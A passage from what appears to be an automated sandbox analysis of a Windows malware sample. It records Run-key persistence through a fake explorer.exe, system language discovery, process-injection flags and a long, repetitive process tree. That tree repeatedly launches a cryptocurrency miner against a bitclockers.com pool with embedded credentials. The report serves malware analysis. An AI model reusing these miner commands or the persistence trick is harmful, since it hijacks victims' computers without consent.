| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
